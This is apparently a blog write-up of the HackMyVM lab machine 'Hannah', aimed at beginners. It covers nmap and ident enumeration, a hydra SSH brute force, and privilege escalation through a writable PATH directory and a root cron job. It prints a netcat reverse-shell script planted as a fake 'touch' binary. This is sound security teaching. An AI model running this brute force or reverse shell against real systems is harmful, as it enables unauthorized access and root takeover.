NepCodeX

Byte Musings: Where Tech Meets Curiosity


Hannah Walkthrough From HackMyVM – Writeup

full walkthrough of hannah from hackmyvm platform writeup series

The first machine on the platform HackMyVM is a very easy machine authored by the user smL. This machine simply features basic enumeration and bruteforcing. Once we get the password of a user, we can log into the system. Then, we need to abuse the writable path vulnerability in the system. Once we do that, we can get to the root shell. Since this is an easy machine, I will explain everything so that a beginner can enjoy it. “Hannah Walkthrough From HackMyVM – Writeup”

Click here to download the machine’s file

Identify the target machine

I always add virtual machines in a NAT network. While it’s a good practice to use a Host-Only network because we cannot trust all downloaded machines, it’s convenient to use a NAT network instead. Anyways, we have to make sure that the attacking and target machines are on the same network.

In my case, the subnet is “10.0.0.0/24”. This means that IP addresses can range from 10.0.0.1 to 10.0.0.254.

Since we have fixed-length numeric IP addresses in IPv4, we can perform ARP scans to check live hosts. We can achieve this using binaries like fping and netdiscover.

❯ fping -aqg 10.0.0.0/24
10.0.0.1
10.0.0.2
10.0.0.3
10.0.0.4
10.0.0.161

In the output above, the IP address of my Kali machine is 10.0.0.4 whereas that of the target is 10.0.0.161.

Scan services on the target

Now that we have the IP address of the target, we need something to interact with the machine. Every program or service in an operating system is assigned a process identifier (PID). Furthermore, if the process needs to interact with the network, it’s assigned a PORT. An IP address and a port combined make a socket that identifies a service on a machine. There are standard ports for different services like 22 for SSH, 21 for FTP, 80 for HTTP, 443 for HTTPS, etc. Hence, we can interact with the system’s processes through sockets if exposed. We can scan the open ports using nmap.

❯ nmap -T4 -sC -sV -p- -oN nmap.log 10.0.0.161
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-05 23:58 +0545
Nmap scan report for 10.0.0.161
Host is up (0.00097s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
|_auth-owners: root
| ssh-hostkey: 
|   3072 5f1c78369905320982d3d5054c1475d1 (RSA)
|   256 0669ef979b34d7f3c79660d1a1ffd82c (ECDSA)
|_  256 853dda74b2684ea6f7e5f58540902e9a (ED25519)
80/tcp  open  http    nginx 1.18.0
| http-robots.txt: 1 disallowed entry 
|_/enlightenment
|_auth-owners: moksha
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0
113/tcp open  ident?
|_auth-owners: root
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

In the above command, I have used -T4 flag to let nmap scan aggressively since there won’t be any delay in the local network. If we are doing it publicly, we would rather use paranoid or polite mode, i.e. -T0 or -T1 respectively.

-sC is to perform nmap script scan. In the output above, we see the robots.txt information and auth-owners information. This is because we have asked nmap to run some scripts on the open ports.

-sV is to detect services and their version information.

-p flag is used to pass port numbers to scan. If we pass a hyphen like -p-, it scans for all ports ranging from 1 to 65535. Likewise, if we omit this flag, it goes for common ports.

-oN is to write the output to a file.

In the output, we see port 113 is open. This is a auth service that gives us the owner of the services. We can see a username moksha for which we can try bruteforcing.

Bruteforce using moksha on SSH service

We can use various bruteforcing binaries like hydra to spray passwords. In this machine, we can find the password from the rockyou.txt wordlist. In hydra, it’s very simple to perform the operation as follows.

~/hackmyvm/hannah ❯ hydra -l moksha -P ~/rockyou.txt ssh://10.0.0.161 -V

After some time, it matches a password that we can use to log into the machine.

~/hackmyvm/hannah ❯ ssh [email protected]

Enumerate the machine

Once we enter the machine, we can use scripts like linpeas.sh to gather further information about the machine. However, we can perform some checks manually by ourselves. To send files between two machines, we can either use SSH (SCP), host a server on the attacking machine, or directly download from the internet using curl or wget.

~/hackmyvm/hannah ❯ python3 -m http.server

The above command creates a simple web server. We can download the file and make it executable as follows in the target machine.

cd /tmp
wget http://10.0.0.4:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh | tee linpeas.log

Here, we will notice that /media is on PATH of the OS. Furthermore, the directory is writable by everyone. Likewise, there is a cronjob run by root every minute as touch /tmp/enlIghtenment.

Since instead of using an absolute path of touch like /usr/bin/touch /tmp/enlIghtenment, it’s using the relative path. Since we have a writable path /media that comes before /usr/bin, we can place a custom executable that has a reverse shell code with the same name touch.

cd /media
nano touch

The content of touch would be as follows.

#!/bin/bash
nc -e /bin/bash 10.0.0.4 9001

To make it work, we have to open a listener on our attacking kali machine.

nc -nlvp 9001

After some time, we get a connection back in our reverse shell.

Upgrade to an intelligent reverse shell

The notes for the machine are on the following notion page.

https://nullvector0.notion.site/hannah-abce058a949f41f7beb77d3f8ecfae4c

In this way, we can simply get the root shell on this machine. I hope you liked this post and if you have any confusion, make sure you comment it down.

Meanwhile, check other machines from my blog.



5 1 vote
Article Rating
Subscribe
Notify of
guest
0 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments